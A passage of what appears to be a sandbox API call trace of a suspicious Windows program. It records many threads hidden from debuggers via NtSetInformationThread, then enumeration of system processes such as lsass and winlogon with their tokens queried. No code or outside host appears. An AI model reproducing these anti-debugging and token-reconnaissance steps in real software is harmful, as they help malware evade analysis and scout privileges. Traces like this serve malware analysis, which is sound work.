(in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1114, lpBytesBuffer=0x0) returned 0x0 [0091.687] NtSetInformationThread (ThreadHandle=0x1114, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.687] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1118, lpBytesBuffer=0x0) returned 0x0 [0091.688] NtSetInformationThread (ThreadHandle=0x1118, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.688] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x111c, lpBytesBuffer=0x0) returned 0x0 [0091.689] NtSetInformationThread (ThreadHandle=0x111c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.689] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1120, lpBytesBuffer=0x0) returned 0x0 [0091.690] NtSetInformationThread (ThreadHandle=0x1120, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.690] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1124, lpBytesBuffer=0x0) returned 0x0 [0091.691] NtSetInformationThread (ThreadHandle=0x1124, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.691] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1128, lpBytesBuffer=0x0) returned 0x0 [0091.691] NtSetInformationThread (ThreadHandle=0x1128, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.691] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x112c, lpBytesBuffer=0x0) returned 0x0 [0091.692] NtSetInformationThread (ThreadHandle=0x112c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.692] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1130, lpBytesBuffer=0x0) returned 0x0 [0091.693] NtSetInformationThread (ThreadHandle=0x1130, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.693] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1134, lpBytesBuffer=0x0) returned 0x0 [0091.693] NtSetInformationThread (ThreadHandle=0x1134, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.693] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1138, lpBytesBuffer=0x0) returned 0x0 [0091.694] NtSetInformationThread (ThreadHandle=0x1138, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.694] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x113c, lpBytesBuffer=0x0) returned 0x0 [0091.695] NtSetInformationThread (ThreadHandle=0x113c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.695] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1140, lpBytesBuffer=0x0) returned 0x0 [0091.696] NtSetInformationThread (ThreadHandle=0x1140, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.696] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1144, lpBytesBuffer=0x0) returned 0x0 [0091.697] NtSetInformationThread (ThreadHandle=0x1144, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.697] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1148, lpBytesBuffer=0x0) returned 0x0 [0091.697] NtSetInformationThread (ThreadHandle=0x1148, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.697] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x114c, lpBytesBuffer=0x0) returned 0x0 [0091.698] NtSetInformationThread (ThreadHandle=0x114c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.698] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1150, lpBytesBuffer=0x0) returned 0x0 [0091.699] NtSetInformationThread (ThreadHandle=0x1150, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.699] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1154, lpBytesBuffer=0x0) returned 0x0 [0091.701] NtSetInformationThread (ThreadHandle=0x1154, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.701] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1158, lpBytesBuffer=0x0) returned 0x0 [0091.702] NtSetInformationThread (ThreadHandle=0x1158, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.702] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x115c, lpBytesBuffer=0x0) returned 0x0 [0091.702] NtSetInformationThread (ThreadHandle=0x115c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.702] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1160, lpBytesBuffer=0x0) returned 0x0 [0091.729] NtSetInformationThread (ThreadHandle=0x1160, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.729] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1164, lpBytesBuffer=0x0) returned 0x0 [0091.730] NtSetInformationThread (ThreadHandle=0x1164, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.730] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1168, lpBytesBuffer=0x0) returned 0x0 [0091.731] NtSetInformationThread (ThreadHandle=0x1168, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.731] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x116c, lpBytesBuffer=0x0) returned 0x0 [0091.732] NtSetInformationThread (ThreadHandle=0x116c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.732] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1170, lpBytesBuffer=0x0) returned 0x0 [0091.732] NtSetInformationThread (ThreadHandle=0x1170, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.732] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1174, lpBytesBuffer=0x0) returned 0x0 [0091.733] NtSetInformationThread (ThreadHandle=0x1174, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.733] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1178, lpBytesBuffer=0x0) returned 0x0 [0091.734] NtSetInformationThread (ThreadHandle=0x1178, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.734] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x117c, lpBytesBuffer=0x0) returned 0x0 [0091.735] NtSetInformationThread (ThreadHandle=0x117c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.735] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1180, lpBytesBuffer=0x0) returned 0x0 [0091.736] NtSetInformationThread (ThreadHandle=0x1180, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.736] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1184, lpBytesBuffer=0x0) returned 0x0 [0091.736] NtSetInformationThread (ThreadHandle=0x1184, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.736] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1188, lpBytesBuffer=0x0) returned 0x0 [0091.737] NtSetInformationThread (ThreadHandle=0x1188, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.737] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x118c, lpBytesBuffer=0x0) returned 0x0 [0091.738] NtSetInformationThread (ThreadHandle=0x118c, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.738] NtCreateThreadEx (in: ThreadHandle=0x39af9e4, DesiredAccess=0x1fffff, ObjectAttributes=0x0, ProcessHandle=0xffffffff, lpStartAddress=0x41de40, lpParameter=0x0, CreateSuspended=0, StackZeroBits=0x0, SizeOfStackCommit=0x1000, SizeOfStackReserve=0x1000, lpBytesBuffer=0x0 | out: ThreadHandle=0x39af9e4*=0x1190, lpBytesBuffer=0x0) returned 0x0 [0091.738] NtSetInformationThread (ThreadHandle=0x1190, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.739] Sleep (dwMilliseconds=0x3e8) [0092.750] Sleep (dwMilliseconds=0x3e8) [0095.157] Sleep (dwMilliseconds=0x3e8) [0096.294] Sleep (dwMilliseconds=0x3e8) [0097.368] Sleep (dwMilliseconds=0x3e8) [0100.155] Sleep (dwMilliseconds=0x3e8) [0101.158] Sleep (dwMilliseconds=0x3e8) [0102.232] Sleep (dwMilliseconds=0x3e8) [0103.400] RtlInterlockedFlushSList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x0 [0103.400] WSACleanup () returned 0 [0103.597] RtlExitUserThread (Status=0x0) Thread: id = 21 os_tid = 0x9c4 [0073.757] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3aefdc8 | out: TokenHandle=0x3aefdc8*=0x2f0) returned 1 [0073.757] GetTokenInformation (in: TokenHandle=0x2f0, TokenInformationClass=0x12, TokenInformation=0x3aefdc0, TokenInformationLength=0x4, ReturnLength=0x3aefdcc | out: TokenInformation=0x3aefdc0, ReturnLength=0x3aefdcc) returned 1 [0073.757] GetTokenInformation (in: TokenHandle=0x2f0, TokenInformationClass=0x13, TokenInformation=0x3aefdc0, TokenInformationLength=0x4, ReturnLength=0x3aefdcc | out: TokenInformation=0x3aefdc0, ReturnLength=0x3aefdcc) returned 1 [0073.757] GetTokenInformation (in: TokenHandle=0x2f4, TokenInformationClass=0xa, TokenInformation=0x3aefde8, TokenInformationLength=0x38, ReturnLength=0x3aefdcc | out: TokenInformation=0x3aefde8, ReturnLength=0x3aefdcc) returned 1 [0073.757] CloseHandle (hObject=0x2f4) returned 1 [0073.757] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f4 [0073.762] Process32First (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0073.763] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0073.763] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0073.764] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x4) returned 0x2f8 [0073.764] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x0) returned 0 [0073.764] CloseHandle (hObject=0x2f8) returned 1 [0073.764] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0073.765] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x104) returned 0x2f8 [0073.765] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x2fc) returned 1 [0073.765] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0xa, TokenInformation=0x3aefe20, TokenInformationLength=0x38, ReturnLength=0x3aefde4 | out: TokenInformation=0x3aefe20, ReturnLength=0x3aefde4) returned 1 [0073.765] CloseHandle (hObject=0x2fc) returned 1 [0073.765] CloseHandle (hObject=0x2f8) returned 1 [0073.765] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0073.766] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x148) returned 0x2f8 [0073.766] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x2fc) returned 1 [0073.766] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0xa, TokenInformation=0x3aefe20, TokenInformationLength=0x38, ReturnLength=0x3aefde4 | out: TokenInformation=0x3aefe20, ReturnLength=0x3aefde4) returned 1 [0073.766] CloseHandle (hObject=0x2fc) returned 1 [0073.766] CloseHandle (hObject=0x2f8) returned 1 [0073.766] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0073.767] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x178) returned 0x2f8 [0073.767] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x2fc) returned 1 [0073.767] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0xa, TokenInformation=0x3aefe20, TokenInformationLength=0x38, ReturnLength=0x3aefde4 | out: TokenInformation=0x3aefe20, ReturnLength=0x3aefde4) returned 1 [0073.767] CloseHandle (hObject=0x2fc) returned 1 [0073.767] CloseHandle (hObject=0x2f8) returned 1 [0073.767] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0073.768] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x184) returned 0x2f8 [0073.768] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x2fc) returned 1 [0073.768] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0xa, TokenInformation=0x3aefe20, TokenInformationLength=0x38, ReturnLength=0x3aefde4 | out: TokenInformation=0x3aefe20, ReturnLength=0x3aefde4) returned 1 [0073.768] CloseHandle (hObject=0x2fc) returned 1 [0073.768] CloseHandle (hObject=0x2f8) returned 1 [0073.768] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0073.769] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1ac) returned 0x2f8 [0073.769] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x2fc) returned 1 [0073.769] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0xa, TokenInformation=0x3aefe20, TokenInformationLength=0x38, ReturnLength=0x3aefde4 | out: TokenInformation=0x3aefe20, ReturnLength=0x3aefde4) returned 1 [0073.769] CloseHandle (hObject=0x2fc) returned 1 [0073.769] CloseHandle (hObject=0x2f8) returned 1 [0073.769] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0073.770] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1d8) returned 0x2f8 [0073.770] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x2fc) returned 1 [0073.770] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0xa, TokenInformation=0x3aefe20, TokenInformationLength=0x38, ReturnLength=0x3aefde4 | out: TokenInformation=0x3aefe20, ReturnLength=0x3aefde4) returned 1 [0073.770] CloseHandle (hObject=0x2fc) returned 1 [0073.770] CloseHandle (hObject=0x2f8) returned 1 [0073.770] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0073.771] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e0) returned 0x2f8 [0073.771] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x2fc) returned 1 [0073.771] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0xa, TokenInformation=0x3aefe20, TokenInformationLength=0x38, ReturnLength=0x3aefde4 | out: TokenInformation=0x3aefe20, ReturnLength=0x3aefde4) returned 1 [0073.771] CloseHandle (hObject=0x2fc) returned 1 [0073.771] CloseHandle (hObject=0x2f8) returned 1 [0073.771] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0073.772] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1e8) returned 0x2f8 [0073.772] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0xa, TokenHandle=0x3aefdc4 | out: TokenHandle=0x3aefdc4*=0x2fc) returned 1 [0073.772] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0xa, TokenInformation=0x3aefe20, TokenInformationLength=0x38, ReturnLength=0x3aefde4 | out: TokenInformation=0x3aefe20, ReturnLength=0x3aefde4) returned 1 [0073.772] CloseHandle (hObject=0x2fc) returned 1 [0073.772] CloseHandle (hObject=0x2f8) returned 1 [0073.772] Process32Next (in: hSnapshot=0x2f4, lppe=0x3aefe58 | out: lppe=0x3aefe58*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, 